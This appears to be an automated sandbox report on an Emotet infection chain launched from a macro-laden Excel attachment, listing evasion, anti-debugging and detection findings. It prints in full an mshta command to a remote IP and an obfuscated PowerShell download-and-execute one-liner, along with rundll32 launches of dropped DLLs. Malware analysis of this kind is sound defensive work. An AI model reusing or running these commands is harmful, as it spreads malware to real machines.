Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2648 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 00000011.00000002.622474031.00000000005BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000015.00000002.675008085.000000000288E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: u\\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0w_^
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026D374 mov eax, dword ptr fs:[00000030h] 9_2_0026D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038D374 mov eax, dword ptr fs:[00000030h] 10_2_0038D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025D374 mov eax, dword ptr fs:[00000030h] 11_2_0025D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ED374 mov eax, dword ptr fs:[00000030h] 12_2_002ED374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0029D374 mov eax, dword ptr fs:[00000030h] 13_2_0029D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0032D374 mov eax, dword ptr fs:[00000030h] 15_2_0032D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002ED374 mov eax, dword ptr fs:[00000030h] 16_2_002ED374
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/oo/aa/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zefya\nybbbfj.sgf",zLEpZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zefya\nybbbfj.sgf",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wwjqkvceadqbdjp\jzkitex.drd",DvusKnlRvE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wwjqkvceadqbdjp\jzkitex.drd",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xtqzugyhdvvax\ifxy.nbi",ULuJOPPBfclLAtS Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xtqzugyhdvvax\ifxy.nbi",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jgryagnlwd\cnso.vdd",fTwMfsDu Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jgryagnlwd\cnso.vdd",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iclyvfrvkfq\cpbsu.fzk",QAFiBTE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iclyvfrvkfq\cpbsu.fzk",DllRegisterServer
Yara detected Xls With Macro 4.0
Source: Yara match File source: Attachment-2801.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\Attachment-2801.xls, type: DROPPED
Source: rundll32.exe, 00000015.00000002.671804568.00000000009E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.671804568.00000000009E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: rundll32.exe, 00000015.00000002.671804568.00000000009E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 10.2.rundll32.exe.510000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.510000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.260000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2520000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2240000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.260000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.320000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.26e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2d30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.500000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.9a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.500000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.390000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.460000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2830000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f60000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2610000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2230000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.2e00000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.8.unpack, type: UNPACKEDPE
